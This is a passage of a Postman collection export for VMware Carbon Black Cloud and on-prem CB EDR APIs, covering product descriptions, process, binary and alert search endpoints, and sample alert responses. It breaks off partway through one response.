Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","external_id"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"a3a91aab-96d5-47c9-9065-1d639e35f559","name":"Get External ID for AWS Account","originalRequest":{"method":"GET","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/external_id"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:10:57 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"54"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"037cbc57-321e-4659-9792-cbad87a99a94"}],"cookie":[],"responseTime":null,"body":"{\n    \"external_id\": \"afd5813b-e3c6-471a-b30e-3a8577f89111\"\n}"}],"_postman_id":"f0c08865-af14-4c4c-a63a-ee38423e15f2"}],"id":"4659c083-6740-42c8-be6e-25439653ee42","description":"<p>VMware Carbon Black Cloud Workload for Public Cloud provides the ability to secure AWS workloads while simplifying the overhead of AWS account management. Core capabilities include:</p>\n<ul>\n<li>Single and multiple AWS account management.</li>\n<li>Auto-generated CI-CD agent installation packages.</li>\n<li>Enhanced visibility into inventory of protected and unprotected workloads.</li>\n</ul>\n<p>Prior to the Carbon Black Cloud Workload for Public Cloud, Amazon EC2 instances were treated as Endpoints. We recommend updating the Carbon Black sensor to the latest sensor version prior to enabling the Carbon Black Cloud Workload for Public Cloud. These sensors can also be upgraded after the Carbon Black Cloud Workload for Public Cloud is enabled.</p>\n<h2 id=\"requirements\">Requirements</h2>\n<ul>\n<li>Carbon Black Cloud Workload - You must have purchased one of the Carbon Black Cloud Workload packages.</li>\n<li>Minimum sensor versions: Version: 3.8 (Windows) &amp; 2.13 (Linux). Check they’re the correct sensor version.</li>\n</ul>\n<h2 id=\"aws-account-management\">AWS Account Management</h2>\n<p>Infosec and AWS administrators can easily manage their AWS accounts and regions. They can:</p>\n<ul>\n<li>Add a single account.</li>\n<li>Leverage bulk import of accounts to facilitate quick onboarding of existing AWS accounts.</li>\n<li>Search and export onboarded AWS accounts and regions into an easy-to-consume format.</li>\n</ul>\n","_postman_id":"4659c083-6740-42c8-be6e-25439653ee42","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}}],"id":"436e5998-6a50-4c4e-a1eb-e07ba5bc1c00","description":"<h2 id=\"introduction\">Introduction</h2>\n<p>VMware Carbon Black Cloud Workload helps you reduce the attack surface and protect critical assets with advanced security purpose-built for workloads. Increase visibility across your environment and simplify operations for IT and security.</p>\n<h2 id=\"getting-started\">Getting started</h2>\n<p>To enable Workload in your Carbon Black Cloud UI, you need to <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/installation\">install the appliance</a> in order to access the data.</p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"c14541af-1387-4483-99b9-7bc5b2e66f5c"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"4b26c876-ea00-4195-ad09-14e3d490b002"}}],"_postman_id":"436e5998-6a50-4c4e-a1eb-e07ba5bc1c00","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}}],"id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","description":"<h2 id=\"carbon-black-cloud-platform\">Carbon Black Cloud Platform</h2>\n<p>The Carbon Black Cloud (formerly the Predictive Security Cloud) is a cloud-native endpoint protection platform (EPP) that provides what you need to secure your endpoints using a single, lightweight agent and an easy-to-use console.</p>\n<h3 id=\"platform-apis\">Platform APIs</h3>\n<p>Platform APIs are available to all Carbon Black Cloud customers and provide APIs for foundational features such as Alert, Device and Process searching.</p>\n<p>* <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform-apis/\">Platform API Documentation</a><br />* <a href=\"https://www.carbonblack.com/products/cb-predictive-security-cloud/\">Learn more about the Carbon Black Cloud</a></p>\n<h2 id=\"carbon-black-cloud-product-specific-apis\">Carbon Black Cloud Product Specific APIs</h2>\n<h3 id=\"endpoint-standard\">Endpoint Standard</h3>\n<p>Endpoint Standard (formerly called CB Defense, NGAV + EDR) combines the capabilities of next-generation antivirus (NGAV) + behavioral EDR to provide prevention and automated detection to defend against today’s advanced cyber attacks. Endpoint Advanced has all of these capabilities, plus Audit &amp; Remediation. Endpoint Enterprise has all of the capabilities of Endpoint Advanced, plus Enterprise EDR.</p>\n<p>* <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/\">Endpoint Standard API Reference</a><br />* <a href=\"https://www.vmware.com/products/carbon-black-cloud.html\">Learn more</a></p>\n<h3 id=\"enterprise-edr\">Enterprise EDR</h3>\n<p>Enterprise EDR (formerly called CB ThreatHunter) is a cloud-based threat hunting and incident response (IR) solution that delivers continuous visibility for top security operations centers (SOC) and IR teams. Enterprise EDR is also available for Endpoint Enterprise customers.</p>\n<p>* <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/\">Enterprise EDR API Reference</a><br />* <a href=\"https://www.vmware.com/products/carbon-black-cloud.html\">Learn more</a></p>\n<h3 id=\"audit-and-remediation\">Audit and Remediation</h3>\n<p>Audit &amp; Remediation (formerly called CB LiveOps) is a security operations solution that provides system audit and remote response capabilities for endpoints and workloads from a cloud-native endpoint protection platform (EPP). Audit &amp; Remediation is also available for Endpoint Advanced and Endpoint Enterprise customers.</p>\n<p>* <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/\">Audit and Remediation API Reference</a><br />* <a href=\"https://www.vmware.com/products/carbon-black-cloud.html\">Learn more</a></p>\n<h3 id=\"workload\">Workload</h3>\n<p>VMware Carbon Black Cloud Workload helps you reduce the attack surface and protect critical assets with advanced security purpose-built for VMware Workloads and AWS Workloads.</p>\n<p>* <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/\">Workload API Reference</a><br />* <a href=\"https://www.vmware.com/products/carbon-black-workload.html\">Learn more about VMware Carbon Black Workload</a></p>\n<h3 id=\"container\">Container</h3>\n<p>VMware Carbon Black Cloud Workload helps you reduce the attack surface and protect critical assets with advanced security purpose-built for VMware Workloads and AWS Workloads.</p>\n<p>* <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container/\">Container Command Line Interface Tools</a><br />* <a href=\"https://www.vmware.com/products/carbon-black-cloud-container.html\">Learn more about VMware Carbon Black Container</a></p>\n<h2 id=\"carbon-black-cloud-api-concepts\">Carbon Black Cloud API Concepts</h2>\n<h3 id=\"authentication\">Authentication</h3>\n<p>Carbon Black Cloud APIs are authenticated using API Keys.</p>\n<p>* <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/authentication/\">Authentication Guide</a></p>\n<h3 id=\"role-based-access-control-rbac\">Role Based Access Control (RBAC)</h3>\n<p>Carbon Black Cloud APIs support Role-Based Access Control. To learn about how to leverage RBAC using APIs, view our guide here.</p>\n<p>* <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/authentication/#role-based-access-control\">RBAC Guide</a></p>\n<h3 id=\"rate-limiting\">Rate Limiting</h3>\n<p>* <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/rate-limiting/\">Rate Limiting Guide</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"fcca5453-cac1-44b0-968d-b89759319eea"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"1f2dc0c2-6de7-4c0e-84c2-4e54558330be"}}],"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1"},{"name":"On Prem","item":[{"name":"CB EDR","item":[{"name":"Process Data","item":[{"name":"Process Search","id":"8b5e2510-4c69-4405-b7ae-b9b4b5e5133a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":false},"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"url":"{{cb_url}}/api/v1/process?q=chrome.exe&rows=1&start=0&sort=&facet=false&facet.field=process_name&facet.field=hostname&facet.field=process_md5","description":"<p>Process search. Parameters passed as a query string.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.3/rest-api/#process-search\">See the Documentation</a></p>\n","urlObject":{"path":["api","v1","process"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>REQUIRED Query string. Accepts the same data as the search box on the Process Search page.</p>\n","type":"text/plain"},"key":"q","value":"chrome.exe"},{"description":{"content":"<p>OPTIONAL Return this many rows, 10 by default.</p>\n","type":"text/plain"},"key":"rows","value":"1"},{"description":{"content":"<p>OPTIONAL Start at this row, 0 by default.</p>\n","type":"text/plain"},"key":"start","value":"0"},{"description":{"content":"<p>OPTIONAL Sort rows by this field and order. last_update desc by default.</p>\n","type":"text/plain"},"key":"sort","value":""},{"description":{"content":"<p>OPTIONAL Return facet results. ‘false’ by default, set to ‘true’ for facets.</p>\n","type":"text/plain"},"key":"facet","value":"false"},{"description":{"content":"<p>OPTIONAL facet field name to return. Multiple facet.field parameters can be specified in a query.</p>\n","type":"text/plain"},"key":"facet.field","value":"process_name"},{"description":{"content":"<p>OPTIONAL facet field name to return. Multiple facet.field parameters can be specified in a query.</p>\n","type":"text/plain"},"key":"facet.field","value":"hostname"},{"description":{"content":"<p>OPTIONAL facet field name to return. Multiple facet.field parameters can be specified in a query.</p>\n","type":"text/plain"},"key":"facet.field","value":"process_md5"},{"disabled":true,"description":{"content":"<p>OPTIONAL if set to true, CB will automatically fix the query and insert joins to make it comprehensive (reducing performance)</p>\n","type":"text/plain"},"key":"cb.comprehensive_search","value":""},{"disabled":true,"description":{"content":"<p>OPTIONAL if set to true, enable fuzzy faceting for performance (default is set in the cb.conf file)</p>\n","type":"text/plain"},"key":"cb.facet.fuzzy","value":""},{"disabled":true,"description":{"content":"<p>OPTIONAL group by a field name. For example, if query parameter cb.group=id, search will return one result per process</p>\n","type":"text/plain"},"key":"cb.group","value":""},{"disabled":true,"key":"cb.urlver","value":"1"}],"variable":[]}},"response":[],"_postman_id":"8b5e2510-4c69-4405-b7ae-b9b4b5e5133a"},{"name":"Process Summary","id":"48b7e888-0432-4098-8d2a-a5882a5942be","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":false},"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"url":"{{cb_url}}/api/v1/process/{{cb_process_id}}/{{cb_segment_id}}","description":"<p>Gets basic process information for segment <code>segment_id</code> of process <code>process_id</code>.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#process-summary\">See the Documentation</a></p>\n","urlObject":{"path":["api","v1","process","{{cb_process_id}}","{{cb_segment_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"48b7e888-0432-4098-8d2a-a5882a5942be"},{"name":"Process Segment Details","id":"625f477a-9ba0-43c5-b296-dfdbba18003e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":false},"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"url":"{{cb_url}}/api/v1/process/{{cb_process_id}}/segment","description":"<p>A JSON object represnting the metadata associated with the process.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#process-segment-details\">See the Documentation</a></p>\n","urlObject":{"path":["api","v1","process","{{cb_process_id}}","segment"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"625f477a-9ba0-43c5-b296-dfdbba18003e"},{"name":"Process Event Details","id":"38956c11-675a-4641-81e1-f02a3eacffce","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":false},"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"url":"{{cb_url}}/api/v1/process/{{cb_process_id}}/{{cb_segment_id}}/event","description":"<p>Gets the events for the process with CB <code>process_id</code> and <code>segment_id</code>. There are slight differences in the returned payload between the <code>v1</code>, <code>v2</code>, <code>v3</code>, and <code>v4</code> endpoints. These differences will be discussed in detail in the “Returns” section of the documentation.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#process-event-details\">See the Documentation</a></p>\n","urlObject":{"path":["api","v1","process","{{cb_process_id}}","{{cb_segment_id}}","event"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"38956c11-675a-4641-81e1-f02a3eacffce"},{"name":"Process Preview","id":"1b2ccc9d-44d4-458e-a8c9-479232a0777c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/process/{{cb_process_id}}/{{cb_segment_id}}/preview","description":"<p>Process preview. Requires <code>process_id</code> and <code>segment_id</code>.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#process-preview\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","process","{{cb_process_id}}","{{cb_segment_id}}","preview"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>[OPTIONAL] A process query string. If present, preview results will highlight matching terms</p>\n","type":"text/plain"},"key":"q","value":"windows"}],"variable":[]}},"response":[],"_postman_id":"1b2ccc9d-44d4-458e-a8c9-479232a0777c"},{"name":"Collective Defense Cloud Query","id":"429f0d99-e177-436f-b8ac-a6b985c958d5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/process/{{cb_process_id}}/{{cb_segment_id}}/threat_intel_hits","description":"<p>Queries the CB Response Collective Defense Cloud for more information on potential IOCs matched by the selected process. Requires <code>process_id</code> and <code>segment_id</code>.</p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","process","{{cb_process_id}}","{{cb_segment_id}}","threat_intel_hits"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"429f0d99-e177-436f-b8ac-a6b985c958d5"}],"id":"2105dbd5-fee4-42fa-9fc7-3a3850593c66","_postman_id":"2105dbd5-fee4-42fa-9fc7-3a3850593c66","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}}},{"name":"Binary Data","item":[{"name":"Binary Search","id":"226447d5-18c8-4600-92cd-bf12e7c4f847","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"url":"{{cb_url}}/api/v1/binary/?q=md5:EBF71EBF6C671238BCB023B91D25971C","description":"<p>Binary search. Parameters passed as query string.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#binary-search\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","binary",""],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>[OPTIONAL] Return this many rows, 10 by default</p>\n","type":"text/plain"},"key":"rows","value":""},{"disabled":true,"description":{"content":"<p>[OPTIONAL] Start at this row, 0 by default</p>\n","type":"text/plain"},"key":"start","value":""},{"disabled":true,"description":{"content":"<p>[OPTIONAL] Sort rows by this field and order. server_added_timestamp desc by default</p>\n","type":"text/plain"},"key":"sort","value":""},{"disabled":true,"description":{"content":"<p>[OPTIONAL] Return facet results. ‘false’ by default, set to ‘true’ for facets</p>\n","type":"text/plain"},"key":"facet","value":""},{"disabled":true,"description":{"content":"<p>[OPTIONAL] facet field name to return. Multiple facet.field parameters can be specified in a query</p>\n","type":"text/plain"},"key":"facet.field","value":""},{"key":"q","value":"md5:EBF71EBF6C671238BCB023B91D25971C"}],"variable":[]}},"response":[],"_postman_id":"226447d5-18c8-4600-92cd-bf12e7c4f847"},{"name":"Download Binary","id":"c558133f-b82c-4cd8-bdb3-d9b236d84917","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/binary/{{cb_md5}}","description":"<p>Download the binary with this md5 hash.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#download-binary\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","binary","{{cb_md5}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c558133f-b82c-4cd8-bdb3-d9b236d84917"},{"name":"Retrieve Binary Icon","id":"eb0f4181-3a0d-4758-a19d-98279a59227e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/binary/{{cb_md5}}/icon","description":"<p>Returns the icon for the binary with the provided md5</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#retrieve-binary-icon\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","binary","{{cb_md5}}","icon"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"eb0f4181-3a0d-4758-a19d-98279a59227e"},{"name":"Retrieve Binary Metadata","id":"853593cf-9b90-4203-958f-55f27fea2729","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/binary/{{cb_md5}}/summary","description":"<p>Returns the metadata for the binary with the provided md5</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#retrieve-binary-metadata\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","binary","{{cb_md5}}","summary"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"853593cf-9b90-4203-958f-55f27fea2729"}],"id":"83acccc1-4731-4ebb-ab82-451f9d3b8e1a","_postman_id":"83acccc1-4731-4ebb-ab82-451f9d3b8e1a","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}}},{"name":"Alerts","item":[{"name":"Search Alerts","id":"f80ff1a1-882f-49de-ba2a-385c6f892524","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v2/alert?q=created_time:[2020-01-01T09:45:00 TO *]&rows=&start=&sort=&facet=true","description":"<p>Alert search</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#search-alerts\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v2","alert"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>[REQUIRED] Query string. Accepts the same data as the alert search box on the Triage Alerts page</p>\n","type":"text/plain"},"key":"q","value":"created_time:[2020-01-01T09:45:00 TO *]"},{"description":{"content":"<p>[OPTIONAL] Return this many rows, 10 by default.</p>\n","type":"text/plain"},"key":"rows","value":""},{"description":{"content":"<p>[OPTIONAL] Start at this row, 0 by default</p>\n","type":"text/plain"},"key":"start","value":""},{"description":{"content":"<p>[OPTIONAL] Sort rows by this field and order. last_update desc by default</p>\n","type":"text/plain"},"key":"sort","value":""},{"description":{"content":"<p>[OPTIONAL] Return facet results. ‘false’ by default, set to ‘true’ for facets</p>\n","type":"text/plain"},"key":"facet","value":"true"}],"variable":[]}},"response":[{"id":"e74ec861-5cf4-4b6f-b25c-ea79698c55b9","name":"Get all alerts since timestamp","originalRequest":{"method":"GET","header":[],"url":{"raw":"{{cb_url}}/api/v2/alert?q=created_time:[2020-01-01T09:45:00 TO *]&rows=&start=&sort=&facet=true","host":["{{cb_url}}"],"path":["api","v2","alert"],"query":[{"key":"q","value":"created_time:[2020-01-01T09:45:00 TO *]","description":"[REQUIRED] Query string. Accepts the same data as the alert search box on the Triage Alerts page"},{"key":"rows","value":"","description":"[OPTIONAL] Return this many rows, 10 by default."},{"key":"start","value":"","description":"[OPTIONAL] Start at this row, 0 by default"},{"key":"sort","value":"","description":"[OPTIONAL] Sort rows by this field and order. last_update desc by default"},{"key":"facet","value":"true","description":"[OPTIONAL] Return facet results. ‘false’ by default, set to ‘true’ for facets"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Server","value":"openresty"},{"key":"Date","value":"Wed, 06 May 2020 04:09:30 GMT"},{"key":"Content-Type","value":"application/json; charset=utf-8"},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Last-Modified","value":"2020-05-05 21:09:30.563876"},{"key":"Cache-Control","value":"no-cache"},{"key":"Cache-Control","value":"no-store"},{"key":"Pragma","value":"no-cache"},{"key":"Expires","value":"Wed, 06 May 2020 04:09:29 GMT"},{"key":"Content-Encoding","value":"gzip"}],"cookie":[],"responseTime":null,"body":"{\n    \"terms\": [\n        \"created_time:[2020-01-01T09:45:00 TO *]\"\n    ],\n    \"results\": [\n        {\n            \"host_count\": 2,\n            \"alert_type\": \"watchlist.hit.feedsearch.binary\",\n            \"sensor_criticality\": 3,\n            \"digsig_result\": \"Unsigned\",\n            \"observed_filename\": [\n                \"c:\\\\users\\\\mark hunter\\\\downloads\\\\cygwin.exe\",\n                \"c:\\\\users\\\\mark hunter\\\\desktop\\\\new folder\\\\cygwin.exe\",\n                \"c:\\\\users\\\\jenny davis\\\\desktop\\\\new folder (2)\\\\setup-x86_64.exe\"\n            ],\n            \"report_score\": 100,\n            \"watchlist_id\": \"tc-95785979\",\n            \"feed_id\": 107,\n            \"other_hostnames\": [\n                \"desktop-h8ogj26\"\n            ],\n            \"created_time\": \"2020-01-01T11:50:06.739Z\",\n            \"report_ignored\": false,\n            \"ioc_type\": \"md5\",\n            \"watchlist_name\": \"tc-95785979\",\n            \"ioc_confidence\": 0.5,\n            \"alert_severity\": 67.5,\n            \"hostname\": \"desktop-s5bo5mf\",\n            \"feed_name\": \"carbonblack\",\n            \"_version_\": 1654526476836405248,\n            \"sha256\": \"AE481452927771AF871E218C85252192E1448C48FBC54BFE38C1BD2303AF4AD0\",\n            \"status\": \"Unresolved\",\n            \"description\": \"EBF71EBF6C671238BCB023B91D25971C\",\n            \"link\": \"https://sandbox.threatconnect.com/auth/indicators/details/file.xhtml?file=EBF71EBF6C671238BCB023B91D25971C&owner=Carbon+Black\",\n            \"md5\": \"EBF71EBF6C671238BCB023B91D25971C\",\n            \"segment_id\": 1,\n            \"observed_filename_total_count\": 3,\n            \"total_hosts\": 0,\n            \"ioc_value\": \"EBF71EBF6C671238BCB023B91D25971C\",\n            \"os_type\": \"Windows\",\n            \"unique_id\": \"f586db92-9f01-46b2-a795-39c8fd7f508d\",\n            \"feed_rating\": 3\n        },\n        {\n            \"host_count\": 2,\n            \"alert_type\": \"watchlist.hit.feedsearch.binary\",\n            \"sensor_criticality\": 3,\n            \"digsig_result\": \"Unsigned\",\n            \"observed_filename\": [\n                \"c:\\\\users\\\\mark hunter\\\\downloads\\\\cygwin.exe\",\n                \"c:\\\\users\\\\mark hunter\\\\desktop\\\\new folder\\\\cygwin.exe\",\n                \"c:\\\\users\\\\jenny davis\\\\desktop\\\\new folder (2)\\\\setup-x86_64.exe\"\n            ],\n            \"report_score\": 100,\n            \"watchlist_id\": \"tc-95785979\",\n            \"feed_id\": 107,\n            \"other_hostnames\": [\n                \"desktop-h8ogj26\"\n            ],\n            \"created_time\": \"2020-01-02T11:50:07.198Z\",\n            \"report_ignored\": false,\n            \"ioc_type\": \"md5\",\n            \"watchlist_name\": \"tc-95785979\",\n            \"ioc_confidence\": 0.5,\n            \"alert_severity\": 67.5,\n            \"hostname\": \"desktop-s5bo5mf\",\n            \"feed_name\": \"carbonblack\",\n            \"_version_\": 1654617074305073152,\n            \"sha256\": \"AE481452927771AF871E218C85252192E1448C48FBC54BFE38C1BD2303AF4AD0\",\n            \"status\": \"Unresolved\",\n            \"description\": \"EBF71EBF6C671238BCB023B91D25971C\",\n            \"link\": \"https://sandbox.threatconnect.com/auth/indicators/details/file.xhtml?file=EBF71EBF6C671238BCB023B91D25971C&owner=Carbon+Black\",\n            \"md5\": \"EBF71EBF6C671238BCB023B91D25971C\",\n            \"segment_id\": 1,\n            \"observed_filename_total_count\": 3,\n            \"total_hosts\": 0,\n            \"ioc_value\": \"EBF71EBF6C671238BCB023B91D25971C\",\n            \"os_type\": \"Windows\",\n            \"unique_id\": \"51d587e4-fd30-495c-aa16-752615271a63\",\n            \"feed_rating\": 3\n        },\n        {\n            \"username\": \"DESKTOP-H8OGJ26\\\\Jenny Davis\",\n            \"alert_type\": \"watchlist.hit.ingress.process\",\n            \"sensor_criticality\": 3,\n            \"modload_count\": 0,\n            \"report_score\": 89,\n            \"watchlist_id\": \"tc-104256559\",\n            \"sensor_id\": 2,\n            \"feed_name\": \"carbonblack\",\n            \"created_time\": \"2020-01-03T22:54:07.886Z\",\n            \"report_ignored\": false,\n            \"ioc_type\": \"ipv4\",\n            \"watchlist_name\": \"tc-104256559\",\n            \"ioc_confidence\": 0.5,\n            \"ioc_attr\": \"{\\\"direction\\\": \\\"Outbound\\\", \\\"protocol\\\": \\\"TCP\\\", \\\"local_port\\\": \\\"50513\\\", \\\"dns_name\\\": \\\"mirrors.xmission.com\\\", \\\"remote_port\\\": \\\"30188\\\", \\\"local_ip\\\": \\\"168428245\\\", \\\"port\\\": \\\"50513\\\", \\\"remote_ip\\\": \\\"-969140723\\\"}\",\n            \"alert_severity\": 60.075,\n            \"crossproc_count\": 0,\n            \"group\": \"default group\",\n            \"hostname\": \"desktop-h8ogj26\",\n            \"filemod_count\": 10062,\n            \"comms_ip\": \"10.10.2.213\",\n            \"netconn_count\": 79,\n            \"interface_ip\": \"10.10.2.213\",\n 